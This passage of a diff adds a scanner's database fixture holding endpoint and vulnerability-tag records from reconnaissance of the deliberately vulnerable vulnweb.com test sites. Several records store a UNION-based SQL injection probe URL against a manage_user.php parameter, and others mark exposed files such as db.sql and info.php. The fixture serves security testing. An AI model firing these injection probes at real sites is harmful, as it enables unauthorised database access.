"nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 3298, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 1, + "source": null, + "http_url": "http://vulnweb.com/table-images/gradback.png", + "content_length": 166, + "page_title": null, + "http_status": 200, + "content_type": "image/png", + "discovered_date": "2024-11-13T02:33:21.523Z", + "response_time": 0.352734538, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 3299, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 1, + "source": null, + "http_url": "http://vulnweb.com/table-images/botleft.png", + "content_length": 192, + "page_title": null, + "http_status": 200, + "content_type": "image/png", + "discovered_date": "2024-11-13T02:33:21.647Z", + "response_time": 0.35785833, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 3300, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 1, + "source": null, + "http_url": "http://vulnweb.com/table-images/botright.png", + "content_length": 185, + "page_title": null, + "http_status": 200, + "content_type": "image/png", + "discovered_date": "2024-11-13T02:33:21.764Z", + "response_time": 0.35715344800000004, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 3302, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 1, + "source": null, + "http_url": "http://vulnweb.com/table-images/blurry.jpg", + "content_length": 2387, + "page_title": null, + "http_status": 200, + "content_type": "image/jpeg", + "discovered_date": "2024-11-13T02:33:22.000Z", + "response_time": 0.35332762100000004, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 3303, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 1, + "source": null, + "http_url": "http://vulnweb.com/style.css", + "content_length": 9894, + "page_title": null, + "http_status": 200, + "content_type": "text/css", + "discovered_date": "2024-11-13T02:33:22.128Z", + "response_time": 0.35299764299999997, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 3306, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 1, + "source": null, + "http_url": "http://vulnweb.com/table-images/gradhover.png", + "content_length": 162, + "page_title": null, + "http_status": 200, + "content_type": "image/png", + "discovered_date": "2024-11-13T02:33:22.483Z", + "response_time": 0.34873113699999997, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 3307, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 1, + "source": null, + "http_url": "http://vulnweb.com/table-images/gradhead.png", + "content_length": 134, + "page_title": null, + "http_status": 200, + "content_type": "image/png", + "discovered_date": "2024-11-13T02:33:22.599Z", + "response_time": 0.35148526500000005, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 3308, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 1, + "source": null, + "http_url": "http://vulnweb.com/table-images/patternb-head.png", + "content_length": 316, + "page_title": null, + "http_status": 200, + "content_type": "image/png", + "discovered_date": "2024-11-13T02:33:22.708Z", + "response_time": 0.342614951, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 3309, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 1, + "source": null, + "http_url": "http://vulnweb.com/table-images/pattern.png", + "content_length": 597, + "page_title": null, + "http_status": 200, + "content_type": "image/png", + "discovered_date": "2024-11-13T02:33:22.822Z", + "response_time": 0.343001899, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 3310, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 1, + "source": null, + "http_url": "http://vulnweb.com/table-images/pattern-head.png", + "content_length": 255, + "page_title": null, + "http_status": 200, + "content_type": "image/png", + "discovered_date": "2024-11-13T02:33:22.941Z", + "response_time": 0.347982663, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 3312, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 1, + "source": null, + "http_url": "http://vulnweb.com/table-images/left.png", + "content_length": 2897, + "page_title": null, + "http_status": 200, + "content_type": "image/png", + "discovered_date": "2024-11-13T02:33:23.198Z", + "response_time": 0.351651032, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 3314, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 1, + "source": null, + "http_url": "http://vulnweb.com/table-images/right.png", + "content_length": 220, + "page_title": null, + "http_status": 200, + "content_type": "image/png", + "discovered_date": "2024-11-13T02:33:23.446Z", + "response_time": 0.355217528, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 3315, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 1, + "source": null, + "http_url": "http://vulnweb.com/table-images/patternb.png", + "content_length": 311, + "page_title": null, + "http_status": 200, + "content_type": "image/png", + "discovered_date": "2024-11-13T02:33:23.563Z", + "response_time": 0.354397772, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 3370, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 1, + "source": null, + "http_url": "http://vulnweb.com/?p=1", + "content_length": 4018, + "page_title": "Acunetix Web Vulnerability Scanner - Test websites", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:33:35.700Z", + "response_time": 0.356036992, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 3417, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 112, + "source": null, + "http_url": "http://www.vulnweb.com/?ref=hackernoon.com", + "content_length": 4018, + "page_title": "Acunetix Web Vulnerability Scanner - Test websites", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:33:45.990Z", + "response_time": 0.351202765, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 3418, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 112, + "source": null, + "http_url": "http://www.vulnweb.com/?rev=23", + "content_length": 4018, + "page_title": "Acunetix Web Vulnerability Scanner - Test websites", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:33:46.119Z", + "response_time": 0.34733179200000003, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 3428, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 112, + "source": null, + "http_url": "http://www.vulnweb.com/https://torproject.org/https://en.wikipedia.org/wiki/.onionhttps://security.stackexchange.com/questions/78682/https://www.torproject.org/projects/torbrowser.html.enhttps://tails.boum.org/https://www.whonix.org/https://www.whonix.org/wiki/VirtualBoxhttps://www.virtualbox.org/https://www.whonix.org/wiki/Downloadhttps://panopticlick.eff.org/http://maill4dnx45yrtsy.onion/https://www.torproject.org/docs/hidden-services.html.enhttps://security.stackexchange.com/questions/79438/https://en.wikipedia.org/wiki/Forward_secrecyhttps://en.wikipedia.org/wiki/Off-the-Record_Messaginghttps://whispersystems.org/blog/asynchronous-security/https://f5.com/glossary/ssl-offloadinghttp://en.wikipedia.org/wiki/SSL_accelerationhttp://nginx.com/blog/nginx-ssl/http://www.pcgamer.com/dota-2-esports-league-suspended-after-players-hit-by-ddos-attacks/https://security.stackexchange.com/a/79363/12https://security.stackexchange.com/a/31846/39623https://hashcat.net/oclhashcat/https://security.stackexchange.com/a/51080/39623https://www.ietf.org/rfc/rfc2898.txthttps://www.ietf.org/rfc/rfc2104.txthttps://hashcat.net/oclhashcat/https://hashcat.net/wiki/doku.php?id=rule_based_attackhttps://hashcat.net/wiki/doku.php?id=dictionary_attackhttps://security.stackexchange.com/a/7701/39623https://hynek.me/articles/hardening-your-web-servers-ssl-ciphers/http://hynek.mehttp://wiki.apache.org/tomcat/HowTo/SSLCiphershttp://markmail.org/message/zn4namfhypyxum23https://security.stackexchange.com/a/77018/39623http://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-52r1.pdfhttps://ssllabs.comhttp://webstersprodigy.net/2012/02/04/serving-back-xml-for-xss/http://azure.microsoft.com/en-us/documentation/articles/cache-dotnet-how-to-use-azure-redis-cache", + "content_length": 0, + "page_title": null, + "http_status": 0, + "content_type": null, + "discovered_date": "2024-11-13T02:34:16.474Z", + "response_time": null, + "webserver": null, + "is_default": false, + "matched_gf_patterns": "idor,interestingEXT,interestingparams,sqli,ssti,xss", + "techs": [], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 3429, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 112, + "source": null, + "http_url": "http://www.vulnweb.com/admin", + "content_length": 0, + "page_title": null, + "http_status": 0, + "content_type": null, + "discovered_date": "2024-11-13T02:34:16.617Z", + "response_time": null, + "webserver": null, + "is_default": false, + "matched_gf_patterns": "interestingsubs", + "techs": [], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 3430, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/%E2%80%93", + "content_length": 0, + "page_title": null, + "http_status": 404, + "content_type": null, + "discovered_date": "2024-11-13T02:34:41.344Z", + "response_time": null, + "webserver": null, + "is_default": false, + "matched_gf_patterns": null, + "techs": [], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 3431, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 82, + "source": null, + "http_url": "http://testhtml5.vulnweb.com/static/css", + "content_length": 0, + "page_title": null, + "http_status": 403, + "content_type": null, + "discovered_date": "2024-11-13T02:34:48.482Z", + "response_time": null, + "webserver": null, + "is_default": false, + "matched_gf_patterns": null, + "techs": [], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 3432, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/admin", + "content_length": 262, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:34:58.632Z", + "response_time": 0.190799009, + "webserver": null, + "is_default": false, + "matched_gf_patterns": null, + "techs": [], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 3433, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": null, + "source": null, + "http_url": "http://rest.vulnweb.com/config.php", + "content_length": 0, + "page_title": null, + "http_status": 200, + "content_type": "text/html; charset=UTF-8", + "discovered_date": "2024-11-13T02:35:19.718Z", + "response_time": 0.144768984, + "webserver": null, + "is_default": false, + "matched_gf_patterns": null, + "techs": [], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 3434, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": null, + "source": null, + "http_url": "http://rest.vulnweb.com/db", + "content_length": 317, + "page_title": null, + "http_status": 200, + "content_type": "application/x-sql", + "discovered_date": "2024-11-13T02:35:23.623Z", + "response_time": 0.234308636, + "webserver": null, + "is_default": false, + "matched_gf_patterns": null, + "techs": [], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 3435, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": null, + "source": null, + "http_url": "http://rest.vulnweb.com/db.sql", + "content_length": 317, + "page_title": null, + "http_status": 200, + "content_type": "application/x-sql", + "discovered_date": "2024-11-13T02:35:23.721Z", + "response_time": 0.192408103, + "webserver": null, + "is_default": false, + "matched_gf_patterns": null, + "techs": [], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 3436, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": null, + "source": null, + "http_url": "http://rest.vulnweb.com/index.php", + "content_length": 3556, + "page_title": null, + "http_status": 200, + "content_type": "text/html; charset=UTF-8", + "discovered_date": "2024-11-13T02:35:37.972Z", + "response_time": 0.616522031, + "webserver": null, + "is_default": false, + "matched_gf_patterns": null, + "techs": [], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 3437, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": null, + "source": null, + "http_url": "http://rest.vulnweb.com/info.php", + "content_length": 83050, + "page_title": null, + "http_status": 200, + "content_type": "text/html; charset=UTF-8", + "discovered_date": "2024-11-13T02:35:38.047Z", + "response_time": 0.263707375, + "webserver": null, + "is_default": false, + "matched_gf_patterns": null, + "techs": [], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 3438, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/cgi-bin/server-status", + "content_length": 0, + "page_title": null, + "http_status": 200, + "content_type": null, + "discovered_date": "2024-11-13T02:36:34.420Z", + "response_time": null, + "webserver": null, + "is_default": false, + "matched_gf_patterns": null, + "techs": [], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 3439, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": null, + "source": null, + "http_url": "http://testasp.vulnweb.com/login.asp", + "content_length": 3194, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:36:49.140Z", + "response_time": 0.181644866, + "webserver": null, + "is_default": false, + "matched_gf_patterns": null, + "techs": [], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 3440, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": null, + "source": null, + "http_url": "http://testaspnet.vulnweb.com/test.txt", + "content_length": 3, + "page_title": null, + "http_status": 200, + "content_type": "text/plain", + "discovered_date": "2024-11-13T02:37:47.204Z", + "response_time": 0.203764171, + "webserver": null, + "is_default": false, + "matched_gf_patterns": null, + "techs": [], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 3441, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": null, + "source": null, + "http_url": "http://testhtml5.vulnweb.com/examples", + "content_length": 493, + "page_title": null, + "http_status": 200, + "content_type": "text/html; charset=utf-8", + "discovered_date": "2024-11-13T02:38:13.812Z", + "response_time": 0.176535919, + "webserver": null, + "is_default": false, + "matched_gf_patterns": null, + "techs": [], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 3442, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": null, + "source": null, + "http_url": "http://testphp.vulnweb.com/CVS", + "content_length": 595, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:38:54.377Z", + "response_time": 0.175241838, + "webserver": null, + "is_default": false, + "matched_gf_patterns": null, + "techs": [], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 3443, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": null, + "source": null, + "http_url": "http://testphp.vulnweb.com/images", + "content_length": 377, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:38:59.424Z", + "response_time": 0.170872602, + "webserver": null, + "is_default": false, + "matched_gf_patterns": null, + "techs": [], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 3444, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": null, + "source": null, + "http_url": "http://testphp.vulnweb.com/index.php", + "content_length": 4958, + "page_title": null, + "http_status": 200, + "content_type": "text/html; charset=UTF-8", + "discovered_date": "2024-11-13T02:38:59.816Z", + "response_time": 0.173411136, + "webserver": null, + "is_default": false, + "matched_gf_patterns": null, + "techs": [], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 3445, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": null, + "source": null, + "http_url": "http://testphp.vulnweb.com/vendor", + "content_length": 268, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:39:16.006Z", + "response_time": 0.210950848, + "webserver": null, + "is_default": false, + "matched_gf_patterns": null, + "techs": [], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 3446, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": null, + "source": null, + "http_url": "http://vulnweb.com/index.html", + "content_length": 4018, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:39:41.643Z", + "response_time": 0.179999805, + "webserver": null, + "is_default": false, + "matched_gf_patterns": null, + "techs": [], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 3447, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/A01/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+", + "content_length": 0, + "page_title": null, + "http_status": 200, + "content_type": null, + "discovered_date": "2024-11-13T02:40:02.923Z", + "response_time": null, + "webserver": null, + "is_default": false, + "matched_gf_patterns": null, + "techs": [], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 3448, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+", + "content_length": 0, + "page_title": null, + "http_status": 200, + "content_type": null, + "discovered_date": "2024-11-13T02:40:03.908Z", + "response_time": null, + "webserver": null, + "is_default": false, + "matched_gf_patterns": null, + "techs": [], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 3449, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/A01/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+", + "content_length": 0, + "page_title": null, + "http_status": 200, + "content_type": null, + "discovered_date": "2024-11-13T02:40:04.079Z", + "response_time": null, + "webserver": null, + "is_default": false, + "matched_gf_patterns": null, + "techs": [], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 3450, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+", + "content_length": 0, + "page_title": null, + "http_status": 200, + "content_type": null, + "discovered_date": "2024-11-13T02:40:04.918Z", + "response_time": null, + "webserver": null, + "is_default": false, + "matched_gf_patterns": null, + "techs": [], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 3451, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+", + "content_length": 0, + "page_title": null, + "http_status": 200, + "content_type": null, + "discovered_date": "2024-11-13T02:40:05.084Z", + "response_time": null, + "webserver": null, + "is_default": false, + "matched_gf_patterns": null, + "techs": [], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 3452, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+", + "content_length": 0, + "page_title": null, + "http_status": 200, + "content_type": null, + "discovered_date": "2024-11-13T02:40:05.239Z", + "response_time": null, + "webserver": null, + "is_default": false, + "matched_gf_patterns": null, + "techs": [], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 3453, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3L/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+", + "content_length": 0, + "page_title": null, + "http_status": 200, + "content_type": null, + "discovered_date": "2024-11-13T02:40:05.388Z", + "response_time": null, + "webserver": null, + "is_default": false, + "matched_gf_patterns": null, + "techs": [], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 3454, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3L/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+", + "content_length": 0, + "page_title": null, + "http_status": 200, + "content_type": null, + "discovered_date": "2024-11-13T02:40:05.909Z", + "response_time": null, + "webserver": null, + "is_default": false, + "matched_gf_patterns": null, + "techs": [], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 3455, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+", + "content_length": 0, + "page_title": null, + "http_status": 200, + "content_type": null, + "discovered_date": "2024-11-13T02:40:06.072Z", + "response_time": null, + "webserver": null, + "is_default": false, + "matched_gf_patterns": null, + "techs": [], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 3456, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/A01/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+", + "content_length": 0, + "page_title": null, + "http_status": 200, + "content_type": null, + "discovered_date": "2024-11-13T02:40:06.223Z", + "response_time": null, + "webserver": null, + "is_default": false, + "matched_gf_patterns": null, + "techs": [], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 3457, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+", + "content_length": 0, + "page_title": null, + "http_status": 200, + "content_type": null, + "discovered_date": "2024-11-13T02:40:06.370Z", + "response_time": null, + "webserver": null, + "is_default": false, + "matched_gf_patterns": null, + "techs": [], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 3458, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+", + "content_length": 0, + "page_title": null, + "http_status": 200, + "content_type": null, + "discovered_date": "2024-11-13T02:40:06.523Z", + "response_time": null, + "webserver": null, + "is_default": false, + "matched_gf_patterns": null, + "techs": [], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 3459, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+", + "content_length": 0, + "page_title": null, + "http_status": 200, + "content_type": null, + "discovered_date": "2024-11-13T02:40:07.921Z", + "response_time": null, + "webserver": null, + "is_default": false, + "matched_gf_patterns": null, + "techs": [], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 3460, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3L/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+", + "content_length": 0, + "page_title": null, + "http_status": 200, + "content_type": null, + "discovered_date": "2024-11-13T02:40:08.082Z", + "response_time": null, + "webserver": null, + "is_default": false, + "matched_gf_patterns": null, + "techs": [], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 3461, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+", + "content_length": 0, + "page_title": null, + "http_status": 200, + "content_type": null, + "discovered_date": "2024-11-13T02:40:08.271Z", + "response_time": null, + "webserver": null, + "is_default": false, + "matched_gf_patterns": null, + "techs": [], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 3462, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": null, + "source": null, + "http_url": "http://www.vulnweb.com/index.html", + "content_length": 4018, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:40:23.665Z", + "response_time": 0.177164925, + "webserver": null, + "is_default": false, + "matched_gf_patterns": null, + "techs": [], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 3463, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 76, + "source": null, + "http_url": "http://testaspnet.vulnweb.com/Foobar-debug.aspx", + "content_length": 0, + "page_title": null, + "http_status": 200, + "content_type": null, + "discovered_date": "2024-11-13T02:43:44.560Z", + "response_time": null, + "webserver": null, + "is_default": false, + "matched_gf_patterns": null, + "techs": [], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerabilitytags", + "pk": 1, + "fields": { + "name": "dns" + } +}, +{ + "model": "startScan.vulnerabilitytags", + "pk": 2, + "fields": { + "name": "caa" + } +}, +{ + "model": "startScan.vulnerabilitytags", + "pk": 3, + "fields": { + "name": "spf" + } +}, +{ + "model": "startScan.vulnerabilitytags", + "pk": 4, + "fields": { + "name": "txt" + } +}, +{ + "model": "startScan.vulnerabilitytags", + "pk": 5, + "fields": { + "name": "tech" + } +}, +{ + "model": "startScan.vulnerabilitytags", + "pk": 6, + "fields": { + "name": "misconfig" + } +}, +{ + "model": "startScan.vulnerabilitytags", + "pk": 7, + "fields": { + "name": "http" + } +}, +{ + "model": "startScan.vulnerabilitytags", + "pk": 8, + "fields": { + "name": "cookie" + } +}, +{ + "model": "startScan.vulnerabilitytags", + "pk": 9, + "fields": { + "name": "generic" + } +}, +{ + "model": "startScan.vulnerabilitytags", + "pk": 10, + "fields": { + "name": "nginx" + } +}, +{ + "model": "startScan.vulnerabilitytags", + "pk": 11, + "fields": { + "name": "php" + } +}, +{ + "model": "startScan.vulnerabilitytags", + "pk": 12, + "fields": { + "name": "ns" + } +}, +{ + "model": "startScan.vulnerabilitytags", + "pk": 13, + "fields": { + "name": "exposure" + } +}, +{ + "model": "startScan.vulnerabilitytags", + "pk": 14, + "fields": { + "name": "apache" + } +}, +{ + "model": "startScan.vulnerabilitytags", + "pk": 15, + "fields": { + "name": "debug" + } +}, +{ + "model": "startScan.vulnerabilitytags", + "pk": 16, + "fields": { + "name": "form" + } +}, +{ + "model": "startScan.vulnerabilitytags", + "pk": 17, + "fields": { + "name": "misc" + } +}, +{ + "model": "startScan.vulnerabilitytags", + "pk": 18, + "fields": { + "name": "miscellaneous" + } +}, +{ + "model": "startScan.vulnerabilitytags", + "pk": 19, + "fields": { + "name": "cve" + } +}, +{ + "model": "startScan.vulnerabilitytags", + "pk": 20, + "fields": { + "name": "cve2022" + } +}, +{ + "model": "startScan.vulnerabilitytags", + "pk": 21, + "fields": { + "name": "carrental" + } +}, +{ + "model": "startScan.vulnerabilitytags", + "pk": 22, + "fields": { + "name": "cms" + } 